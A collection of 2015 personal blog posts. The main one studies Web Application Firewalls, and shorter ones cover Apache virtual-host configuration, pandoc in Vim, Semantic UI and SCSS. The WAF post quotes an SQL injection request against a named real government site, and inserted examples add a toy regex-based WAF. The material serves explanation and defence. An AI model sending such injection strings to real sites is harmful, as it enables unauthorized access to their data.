<div><b>Web Application Firewall</b> - Heron Yang, 2015-09-02</div>
<h3>
Preface</h3>
This is the first post documenting my studies while working in the Ministry of the Interior (Taiwan). Though it's my alternative military service job, I am trying my best to learn from it.<br />
<br />
While I was in the warehouse, I found a Web Application Firewall (WAF), which is a real physical device. It's my first time looking into this kind of device, so here's my study on it.<br />
<br />
<h3>
What is WAF?</h3>
<div>
It's a firewall that applies rules to HTTP conversations (the application layer), defending against attacks like cross-site scripting (XSS), SQL injection, malicious sources, application layer DoS attacks, etc.</div>
<div>
<br /></div>
<div>
So, what's the difference between a WAF and network layer firewalls (which we use more often)? Network layer firewalls operate at the TCP/IP protocol level and only look up rules based on IP addresses and ports. They don't care about the content at the application layer.</div>
<div>
<br /></div>
<div>
Here's an example referring to "<a href="http://www.securityidiots.com/Web-Pentest/WAF-Bypass/waf-bypass-guide-part-1.html">Guide to WAF Bypass by SecurityIdiots</a>". The first line is a normal request, and the second is a request with SQL injection. The second one is detected by the ModSecurity WAF.</div>
<blockquote class="tr_bq">
http://bpc.gov.bd/contactus.php?id=4<br />
http://bpc.gov.bd/contactus.php?id=4' UNION SELECT 1,2,3-- -</blockquote>
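As an added example (not from the original post, and not ModSecurity's real rule set), here is a toy application-layer rule engine in Python that does what the WAF above does: it decodes each query parameter and runs constructed SQL injection and XSS signatures over it, passing the normal request and blocking the injected one. The hostname and the rules are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed rules in the spirit of a WAF signature set (not ModSecurity's
# real rules): an id, a message, and a regex run over each decoded value.
RULES = [
    ("sqli-union", "SQL injection: UNION ... SELECT",
     re.compile(r"\bunion\b[\s/*]+(all\s+)?select\b", re.I)),
    ("sqli-comment", "SQL injection: trailing SQL line comment",
     re.compile(r"--\s")),
    ("xss-script", "Cross-site scripting: script tag",
     re.compile(r"<\s*script\b", re.I)),
]


def decoded_params(url):
    """Return (name, value) pairs with percent-encoding and '+' decoded,
    so the rules see the same text the backend application would."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def inspect(url):
    """Return [(rule_id, param_name), ...] for every rule that fires.
    An empty list means the request passes inspection."""
    hits = []
    for name, value in decoded_params(url):
        for rule_id, _msg, pattern in RULES:
            if pattern.search(value):
                hits.append((rule_id, name))
    return hits


def decide(url):
    """Mimic a blocking WAF: 403 when any rule fires, otherwise 200."""
    return 403 if inspect(url) else 200


if __name__ == "__main__":
    # Constructed requests: the post's normal request and its injected form,
    # plus a percent-encoded variant that the decoder must normalize first.
    for u in ("http://example.com/contactus.php?id=4",
              "http://example.com/contactus.php?id=4' UNION SELECT 1,2,3-- -",
              "http://example.com/contactus.php?id=4%27+UNION+SELECT+1,2,3"):
        print(decide(u), inspect(u), u)
```

A signature engine like this also shows the classic WAF trade-off: the same "union select" text typed into a legitimate comment field would be blocked too, so rules need tuning per application.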
<br />
<h3>
Detecting WAF</h3>
<div>
To detect a WAF, we can use Nmap like:</div>
<blockquote class="tr_bq">
nmap -p80 --script http-waf-detect <host> </blockquote>
<br />
<h3>
Does WAF Work on HTTPS?</h3>
<div>
Yes and no. Since HTTPS traffic is encrypted, a WAF shouldn't be able to read its contents. However, there are two ways for a WAF to inspect SSL-protected traffic:</div>
<div>
<ul>
<li>The WAF also obtains the private key used by the original SSL server.</li>
<li>The WAF runs its own SSL server, which is the one the client sees and talks to. The WAF decrypts the traffic first, applies its rules, then forwards it to the original server over a new SSL-protected connection.</li>
</ul>
</div>
<br />
<h3>
WAF Vendors / Players</h3>
<div>
Software (lower cost, but poor setups must be avoided)</div>
<div>
<ul>
<li>ModSecurity</li>
<li>AQTRONIX WebKnight</li>
</ul>
<div>
Hardware (scalability, performance)</div>
</div>
<div>
<ul>
<li>FortiWeb</li>
<li>Barracuda Networks</li>
</ul>
</div>
<br />
<h3>
Reference</h3>
<div>
<ul>
<li><a href="http://www.securityidiots.com/Web-Pentest/WAF-Bypass/waf-bypass-guide-part-1.html">Guide to WAF Bypass by SecurityIdiots</a></li>
<li><a href="http://security.stackexchange.com/questions/44563/is-ssl-required-for-sites-hosted-behind-waf">Is SSL required for sites hosted behind WAF?</a></li>
</ul>
</div>
Apache Configuration (2015-04-24)<h3>
Preface</h3>
<br />
Writing an Apache config file is a basic requirement for setting up a new website with Apache. It's easy for basic types of websites, since you can find template files online and only a little modification is needed. However, it turned out that I still didn't really know much about how to write the config file, even though I had set up tons of websites already.<br />
<br />
Setting up simple static websites with virtual hosts, or setting up Wordpress websites, is easy. But fully and cleanly controlling permissions, or setting up a Django app, can be complex. So, I am writing this article as a note about Apache config files.<br />
<br />
<h3>
Environment</h3>
I am using Ubuntu 14.04, so I installed those tools by running the following commands:<br />
<br />
<script src="https://gist.github.com/heronyang/6b565a5c895fdd332d5b.js"></script>
Then, instead of modifying the existing config files, I think it's a better idea to add new files under /etc/apache2/sites-available to extend the settings. In my case, I added "bugkiller.conf" for my new website called Bug Killer.<br />
<br />
Also, since most of the time I build more than one website on a machine, "<a href="http://httpd.apache.org/docs/2.2/vhosts/">virtual hosts</a>" became an essential setting in my case. This is the way to make Apache give different responses based on the requested domain name.<br />
<br />
<h3>
Case 1. Setup Static Websites (using Virtual Host)</h3>
<script src="https://gist.github.com/heronyang/357b0cb82ee229f50005.js"></script>
<ul>
<li>ServerAdmin is the email address that receives error logs (or other logs, depending on your settings),</li>
<li>ServerName and ServerAlias are the domain names for your new website,</li>
<li>DocumentRoot is the root directory path of your static website folder,</li>
<li>For logging, LogLevel "warn" sets the verbosity, and the logs are saved to the files named in ErrorLog and CustomLog.</li>
</ul>
<div>
And, in order to let the web server process access the folder correctly, we grant the folder full permission with "AllowOverride All".</div>
<div>
<br /></div>
<div>
<h3>
Case 2. Setup Wordpress Websites (using Virtual Host)</h3>
Same as "Case 1".<br />
<br />
<h3>
Case 3. Setup Django Applications (using Virtual Host)</h3>
<br />
<script src="https://gist.github.com/heronyang/fd762cd0a1939f6ea20c.js"></script>
<ul>
<li>WSGIPythonPath: The path to the Django project root folder. By setting this correctly, the server process knows where the Python files are located.</li>
<li>WSGIScriptAlias: The path to the Django wsgi file, which is the gateway that wires external sockets to our Django project. So, Django should start working once this path is set correctly.</li>
<li>Directory tag: This part is much like the static-files case; one must grant permission to read the wsgi.py file in order to reach the gateway.</li>
<li>For static files, the Apache server has to serve them, since Django does not serve them when DEBUG=False in the Django settings. What we have to do is route "/static/" requests to our static folder and grant permission for that folder.</li>
<li>LogLevel debug: This helped me a lot with debugging, as it let me read the setup errors in the default log files (/var/log/apache2/error.log or /var/log/apache2/access.log).</li>
</ul>
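Since the embedded gists are not visible here, the following is an added example (my own, not the author's gist) of what a bugkiller.conf under /etc/apache2/sites-available could look like for Case 1 and Case 3 on Apache 2.4; hostnames and paths are placeholders. One caveat worth knowing: AllowOverride only controls which .htaccess directives are honored, and on Apache 2.4 access to a directory is actually granted with "Require all granted", so that line is included as well.

```apache
# Constructed example for Apache 2.4 on Ubuntu; hostnames and paths are placeholders.
# Apache does not allow comments on the same line as a directive, so each
# comment sits on its own line.

# Case 1: static site on its own virtual host
<VirtualHost *:80>
    ServerAdmin webmaster@example.com
    ServerName www.example.com
    ServerAlias example.com
    DocumentRoot /var/www/example-static

    <Directory /var/www/example-static>
        Options -Indexes +FollowSymLinks
        # Honor .htaccess files in this tree (what the post's setting does).
        AllowOverride All
        # Apache 2.4 access control; without this the request gets 403.
        Require all granted
    </Directory>

    LogLevel warn
    ErrorLog ${APACHE_LOG_DIR}/example-static-error.log
    CustomLog ${APACHE_LOG_DIR}/example-static-access.log combined
</VirtualHost>

# Case 3: Django application served through mod_wsgi.
# WSGIPythonPath is a server-level directive and must stay outside VirtualHost.
WSGIPythonPath /srv/bugkiller

<VirtualHost *:80>
    ServerAdmin webmaster@example.com
    ServerName bugkiller.example.com
    # The WSGI gateway: every request not matched by an Alias goes to Django.
    WSGIScriptAlias / /srv/bugkiller/bugkiller/wsgi.py

    # Only wsgi.py itself is exposed, not the rest of the project tree.
    <Directory /srv/bugkiller/bugkiller>
        <Files wsgi.py>
            Require all granted
        </Files>
    </Directory>

    # Static files are served by Apache, since Django does not when DEBUG=False.
    Alias /static/ /srv/bugkiller/static/
    <Directory /srv/bugkiller/static>
        Require all granted
    </Directory>

    LogLevel debug
    ErrorLog ${APACHE_LOG_DIR}/bugkiller-error.log
    CustomLog ${APACHE_LOG_DIR}/bugkiller-access.log combined
</VirtualHost>
```

Run "apachectl configtest" after editing, then "a2ensite bugkiller.conf" and reload Apache to activate the virtual host.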
</div>A Fast Way to Generate LaTeX Document using VIM (2015-03-27)<br />Finally, I found a fast way to generate a LaTeX document using VIM, which lets me have a basic LaTeX document within a few seconds. However, a little background knowledge of MarkDown syntax is required (the MarkDown Cheatsheet is <a href="https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet">here</a>).<br />
<br />
<h3>
Step 0: setup</h3>
<h4>
a. install <a href="http://johnmacfarlane.net/pandoc/installing.html">pandoc</a></h4>
<h4>
b. add one line of setting into .vimrc (only have to do once)</h4>
<blockquote class="tr_bq">
map \md <ESC>:!pandoc -V geometry:margin=1in % -s -o %<.pdf<CR>:!open %<.pdf<CR></blockquote>
This is for Mac; if you are using another system, please change "open" to whatever PDF reader you have on your machine.<br />
<br />
<h3>
Step 1: open a new .md file</h3>
<blockquote class="tr_bq">
vim test.md</blockquote>
<br />
<h3>
Step 2: write some MarkDown and save</h3>
<blockquote class="tr_bq">
## This is title<br />
<br />
### Header is here<br />
<br />
- list 1<br />
<br />
- list 2</blockquote>
<h3>
Step 3: press following keys in vim: <ESC> \ m d</h3>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD56MrO5_3Snnct2S3xpN9O2A6y7qZt_1xuEIpHi7_UUsP9hCHwAbkwZx7B6PwJUTAwPQX6YFwR4fEOohIn6JzjxT9EJG7yFVTCxlW2d3TMFOmjCWlBYw3udXngJpUyL4BTIODtLE3WYSw/s1600/Screen+Shot+2015-03-27+at+9.51.37+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD56MrO5_3Snnct2S3xpN9O2A6y7qZt_1xuEIpHi7_UUsP9hCHwAbkwZx7B6PwJUTAwPQX6YFwR4fEOohIn6JzjxT9EJG7yFVTCxlW2d3TMFOmjCWlBYw3udXngJpUyL4BTIODtLE3WYSw/s1600/Screen+Shot+2015-03-27+at+9.51.37+AM.png" height="400" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">PDF file will popup automatically</td></tr>
</tbody></table>
<h3>
Notice</h3>
<div>
<ul>
<li>More settings can be passed to pandoc by adding parameters.</li>
<li>This is a fast way to get basic LaTeX documents, but it may not be the most customizable way.</li>
</ul>
</div>
Setup Semantic UI (2015-03-20)<h3>
Preface</h3>
<div>
There are tons of front-end development frameworks, and Semantic UI is one of them. I found it supports more elements than the others, with a complete design. So, I am trying it out this time.</div>
<div>
<br /></div>
<h3>
Dependencies</h3>
<div>
These are the things that need to be installed before getting started:</div>
<div>
<ul>
<li>node</li>
<ul>
<li>Mac: "brew install node"</li>
<li>Windows: <a href="http://nodejs.org/download/">binary file here</a></li>
</ul>
<li>gulp</li>
<ul>
<li>npm install -g gulp</li>
</ul>
</ul>
<div>
Other dependencies for Semantic UI:</div>
</div>
<div>
<ul>
<li>cd <Semantic-UI directory></li>
<li>npm install</li>
</ul>
<div>
<br /></div>
</div>
<h3>
Build Framework</h3>
<div>
We can customize our design or change the theme in Semantic UI (not covered in this post); the build then generates the CSS and JS files for our website to use.</div>
<div>
To generate the files, type: "gulp install"</div>
<div>
<br /></div>
<h3>
Reference</h3>
<div>
<ul>
<li><a href="http://learnsemantic.com/guide/expert.html">Getting Semantic UI</a></li>
</ul>
</div>
SASS - Helloworld (2015-03-19)<br />People who write CSS may know that it's kind of annoying; SASS and SCSS became the solutions. We learned some basic SCSS code in the Advanced Web Design class today, and it's <a href="https://github.com/heronyang/sass-example">here</a>.<br />
<br />
To compile the SCSS, run "sass --watch ." in the background, and it will update the CSS file constantly.<br />
<br />
And I also asked Prof. Twigg which one I should go with as a beginner, SASS or SCSS. He said SCSS, which is newer.